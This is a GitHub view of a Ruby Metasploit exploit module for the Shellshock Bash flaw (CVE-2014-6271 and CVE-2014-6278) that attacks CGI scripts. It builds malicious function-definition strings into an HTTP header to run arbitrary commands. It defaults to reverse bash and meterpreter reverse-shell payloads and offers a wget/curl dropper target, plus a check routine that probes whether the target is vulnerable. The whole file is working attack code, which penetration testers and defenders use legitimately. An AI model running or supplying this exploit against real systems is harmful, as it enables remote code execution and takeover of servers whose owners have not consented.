-
Notifications
You must be signed in to change notification settings - Fork 1
/
bash_env_cgi_rce.rb
170 lines (160 loc) · 5.57 KB
/
bash_env_cgi_rce.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cgi Bash Environment Variable Code Injection (Shellshock)',
'Description' => %q{
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
handles external environment variables. This module targets CGI scripts in
web servers by setting the HTTP_USER_AGENT environment variable to a
malicious function definition.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die-gr3y', # Added multiple targets and fixed some issues. Works now with most of the payloads.
'Stephane Chazelas', # Vulnerability discovery
'wvu', # Original Metasploit aux module
'juan vazquez', # Allow wvu's module to get native sessions
'lcamtuf' # CVE-2014-6278
],
'References' => [
[ 'CVE', '2014-6271' ],
[ 'CVE', '2014-6278' ],
[ 'CWE', '94' ],
[ 'OSVDB', '112004' ],
[ 'EDB', '34765' ],
[ 'URL', 'https://attackerkb.com/topics/7xGOHWRpGg/cve-2014-6271' ],
[ 'URL', 'https://access.redhat.com/articles/1200223' ],
[ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ]
],
'DisclosureDate' => '2014-09-24',
'Platform' => [ 'unix', 'linux' ],
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_AARCH64 ],
'Privileged' => false,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'Payload' => {
'BadChars' => "\x22\x5B\x5D" # No double quotes and left/right brackets => makes cmd/unix/python payloads work.
},
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_AARCH64 ],
'Type' => :linux_dropper,
'CmdStagerFlavor' => [ 'printf', 'bourne', 'wget', 'curl' ],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 80,
'SSL' => false,
'WfsDelay' => 5
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script']),
OptString.new('METHOD', [true, 'HTTP method to use', 'GET']),
OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
OptInt.new('PAYLOADSIZE', [true, 'Payload size used by the CmdStager', 2048]),
OptEnum.new('CVE', [true, 'CVE to check/exploit', 'Automatic', ['Automatic', 'CVE-2014-6271', 'CVE-2014-6278']])
])
end
def execute_command(cmd, _opts = {})
# create the vulnerable header based on the CVE code and execute the command
case @cve
when 'CVE-2014-6271'
header = %{() { :; }; echo ; /bin/bash -c "#{cmd}"}
when 'CVE-2014-6278'
header = %{() { _; } >_[$($())] { echo ; /bin/bash -c "#{cmd}"; }}
end
return send_request_cgi({
'method' => datastore['METHOD'],
'uri' => normalize_uri(target_uri.path.to_s),
'headers' => {
datastore['HEADER'] => header
}
})
end
def check
@cve_check = {}
if datastore['CVE'] == 'Automatic'
cve_list = [ 'CVE-2014-6271', 'CVE-2014-6278' ]
else
cve_list = [ datastore['CVE'] ]
end
for @cve in cve_list do
# set random marker to be discovered in the http response if target is vulnerable
marker = rand_text_alphanumeric(8..16)
cmd = "echo #{marker}"
res = execute_command(cmd)
if res && res.body.include?(marker)
@cve_check[@cve] = true
print_status("Target is vulnerable for #{@cve}.")
else
@cve_check[@cve] = false
print_status("Target is NOT vulnerable for #{@cve}.")
end
end
if @cve_check['CVE-2014-6271'] || @cve_check['CVE-2014-6278']
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def exploit
case datastore['CVE']
when 'Automatic'
if @cve_check
if @cve_check['CVE-2014-6271']
@cve = 'CVE-2014-6271'
elsif @cve_check['CVE-2014-6278']
@cve = 'CVE-2014-6278'
end
else
# try 6271 vulnerability
@cve = 'CVE-2014-6271'
end
else
@cve = datastore['CVE']
end
print_status("Executing #{target.name} for #{datastore['PAYLOAD']} using vulnerability #{@cve}.")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
# Don't check the response here since the server won't respond
# if the payload is successfully executed.
execute_cmdstager(linemax: datastore['PAYLOADSIZE'])
end
end
end